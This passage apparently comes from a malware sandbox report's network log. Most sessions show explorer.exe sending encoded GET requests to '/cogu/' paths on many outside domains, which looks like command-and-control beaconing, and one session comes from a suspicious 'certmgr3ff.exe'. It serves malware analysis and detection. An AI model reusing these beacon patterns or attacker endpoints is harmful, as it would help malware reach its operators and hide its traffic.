72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.11.20	49805	216.189.108.75	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:49:28.012269974 CEST	6526	OUT	GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1 Host: www.tpmionline.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:49:28.159526110 CEST	6526	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 21:49:28 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Status: 304 Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.11.20	49806	199.34.228.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:49:33.721334934 CEST	6527	OUT	GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1 Host: www.shopsharpgraphics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:49:33.913050890 CEST	6528	IN	HTTP/1.1 302 Found Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private Date: Wed, 13 Oct 2021 13:49:33 GMT Location: https://www.shopsharpgraphics.com/cogu Set-Cookie: publishedsite-xsrf=eyJpdiI6InBxVUZiRDNcL1RDTkhPTEhTZU0zYU1nPT0iLCJ2YWx1ZSI6Ikpsc1BuUEkzYW16MjJZY0p5RGlNR2lUelNWUVp5QzRKVmlwMHduNEdiVjVsbk1ZM050Rzh3anE3WFAweTBNWVhhQURKUG9uVUszck9FajVvK0MzenJ4cGxSeGVVa3lURFVKMW90NWJQUjNXVFZINzhjV2txMEk5cFVZYVdZZnc5IiwibWFjIjoiOGY4ZTdjYmVjMzM2NTc1MWZkOTdkMDhkZDdlOTM0YmZhNjg3YmJiZDMwYTcxMzNkYWRmYjFiZDk3ODQ1YzU5ZCJ9; expires=Wed, 27-Oct-2021 13:49:33 GMT; Max-Age=1209600; path=/ Set-Cookie: XSRF-TOKEN=eyJpdiI6InpVK3N4WDEzYXhHaTdpbmt1ZlNtNlE9PSIsInZhbHVlIjoibDZcL0gxdTR4b3ZHZ2duZFdOUUVRZUk2Yzlna1Y2SEluVlwvY3ByeHZ0TVpubklvYnhjbEZIdTZzWW9CR0hodThoRmd1aHJiU3VTY2l3UWpKeXZiXC9HSVZLQ09rMDdpVFA1N2w4NnFNSmFaajlSOTB2R2ExdUFybXB6aXZqYWlcLzkyIiwibWFjIjoiYThhOTYwZjZiYWU1OTViZDc2ZDNkNjEzZjQ5OWNiZDM2NzhjNGE1ZjAxMGJmYTY0ZmYxMGZkOGQwOTJhYjA1YSJ9; expires=Wed, 27-Oct-2021 13:49:33 GMT; Max-Age=1209600; path=/ Set-Cookie: PublishedSiteSession=eyJpdiI6ImNLVTRLSXl2NkphUjZ5SGFKQ25jRWc9PSIsInZhbHVlIjoiVkJXTFBvclBvVWxlRVdcL1VoSndwRkFFOGpTSFYzN0UzQUg5QUh3U2VsRVVha1lsZFV1RVE5TFwvRXV0YlpVS3VnMGZ1WWhsYXpiTW5pRkIrZXdqNjFqeGl4RTJrb3NaOEVlYm1tcThYUFpJV0x Data Raw: Data Ascii:
Oct 13, 2021 15:49:33.913132906 CEST	6529	IN	Data Raw: 4d 58 4a 47 4f 57 45 32 55 32 31 4c 56 6c 6c 46 54 30 78 4d 5a 6e 63 34 65 69 49 73 49 6d 31 68 59 79 49 36 49 6a 6b 78 4e 44 41 7a 4e 6a 51 34 59 6a 42 6a 5a 57 51 34 5a 54 51 35 5a 57 49 79 4e 6a 68 68 4e 6a 59 7a 4e 57 4d 78 59 6a 4d 33 4d 54 Data Ascii: MXJGOWE2U21LVllFT0xMZnc4eiIsIm1hYyI6IjkxNDAzNjQ4YjBjZWQ4ZTQ5ZWIyNjhhNjYzNWMxYjM3MTMzM2Q1YjQzMTAxZDk0NjBkNDExNGRlOWQzNDE5YjEifQ%3D%3D; expires=Wed, 27-Oct-2021 13:49:33 GMT; Max-Age=1209600; path=/; httponlyX-Host: blu19.sf2p.intern.weebly.ne
Oct 13, 2021 15:49:33.913171053 CEST	6529	IN	Data Raw: 31 38 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d Data Ascii: 18e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.shopsharpgraphics.com/cogu'" /> <title>Redirecting to https://www.shopsharpgraphics.com/cogu</title

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.11.20	49807	15.197.150.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:49:51.480106115 CEST	6531	OUT	GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2 HTTP/1.1 Host: www.jkwhitleyphotography.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:49:51.659526110 CEST	6531	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Oct 2021 13:49:51 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.jkwhitleyphotography.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.11.20	49808	198.54.117.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:49:56.865541935 CEST	6532	OUT	GET /cogu/?E6=S26i6wvHPThQg5EmN96E/uV1flc9kx0qaETcxJTPPIRiBsvCj8OwSBVU0bghLZ2zBTNI&-Z=5j3dv6rhizRPl0MP HTTP/1.1 Host: www.boliden-ab.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.11.20	49809	142.250.186.179	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:02.084647894 CEST	6533	OUT	GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ HTTP/1.1 Host: www.jachaljuega.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:50:02.194884062 CEST	6533	IN	HTTP/1.1 301 Moved Permanently Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 13 Oct 2021 13:50:02 GMT Location: https://www.jachaljuega.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.11.20	49810	75.2.115.196	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:07.418406010 CEST	6534	OUT	GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&-Z=5j3dv6rhizRPl0MP HTTP/1.1 Host: www.xn--4pvw92bcry.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:50:07.575223923 CEST	6535	IN	HTTP/1.1 403 Forbidden Date: Wed, 13 Oct 2021 13:50:07 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: nginx Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.11.20	49811	47.88.32.85	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:13.118230104 CEST	6535	OUT	GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=xvNBpPJxoT3V4STjWu+oXBc4W2+zox4LkJxyAqr5flGYxwgg6ZSnpz45f2Sl431JRkcr HTTP/1.1 Host: www.ceruleden.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:50:13.298154116 CEST	6536	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 13 Oct 2021 13:50:13 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.11.20	49812	198.59.144.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:18.435197115 CEST	6536	OUT	GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP HTTP/1.1 Host: www.centralcontable.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:50:18.570564985 CEST	6537	IN	HTTP/1.1 302 Found Date: Wed, 13 Oct 2021 13:50:18 GMT Server: Apache Content-Security-Policy: upgrade-insecure-requests; Location: https://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP Content-Length: 317 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 6e 74 72 61 6c 63 6f 6e 74 61 62 6c 65 2e 6e 65 74 2f 63 6f 67 75 2f 3f 45 36 3d 37 65 61 7a 61 2b 56 6d 38 79 59 65 6d 73 79 7a 2f 7a 7a 77 6a 57 72 6b 6c 63 38 59 69 35 48 6f 35 48 58 35 54 4e 4d 37 61 6c 6c 52 34 75 72 68 4a 72 6d 52 47 34 59 56 2f 34 38 71 30 62 53 65 66 4f 37 37 26 61 6d 70 3b 2d 5a 3d 35 6a 33 64 76 36 72 68 69 7a 52 50 6c 30 4d 50 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49825	172.217.168.33	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.11.20	49813	198.54.117.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:23.850781918 CEST	6538	OUT	GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=jcFOH/ZxkSx2B+eOzji128R7cFyPyE6Tynf2GelbWKAhzBX6sEIR/9TLWk4pwFmf1t+F HTTP/1.1 Host: www.marvellouslles.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.11.20	49814	198.54.117.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:34.251701117 CEST	6539	OUT	GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1 Host: www.domainair.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.11.20	49815	204.141.43.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:39.583606958 CEST	6539	OUT	GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1 Host: www.nazfoodstuff.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:50:39.754080057 CEST	6541	IN	HTTP/1.1 404 Server: ZGS Date: Wed, 13 Oct 2021 13:50:39 GMT Content-Type: text/html Content-Length: 4647 Connection: close Set-Cookie: 0cea9df7db=cd858cf068bec389eea549b00143a3a9; Path=/ X-XSS-Protection: 1 Set-Cookie: csrfc=255e1502-de38-45e2-b93b-bf59983067bc;path=/;priority=high Set-Cookie: _zcsr_tmp=255e1502-de38-45e2-b93b-bf59983067bc;path=/;SameSite=Strict;priority=high Pragma: no-cache Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 74 6f 70 43 6f 6c 6f 72 73 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35 Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45
Oct 13, 2021 15:50:39.754148006 CEST	6542	IN	Data Raw: 32 70 78 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b Data Ascii: 2px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:3px; padding:18px 0px; } .content{ back
Oct 13, 2021 15:50:39.754194975 CEST	6543	IN	Data Raw: 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 Data Ascii: -weight:400; } .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0;
Oct 13, 2021 15:50:39.754240990 CEST	6544	IN	Data Raw: 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d Data Ascii: ors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <div class="content"> <div class="textArea">

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.11.20	49816	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:44.773617983 CEST	6545	OUT	GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1 Host: www.cacaolixir.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:50:44.881392956 CEST	6546	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Oct 2021 13:50:44 GMT Content-Type: text/html Content-Length: 275 ETag: "615f9602-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.11.20	49817	66.96.130.148	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:50:49.983412027 CEST	6546	OUT	GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1 Host: www.fishermandm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:50:50.095890045 CEST	6548	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Oct 2021 13:50:50 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 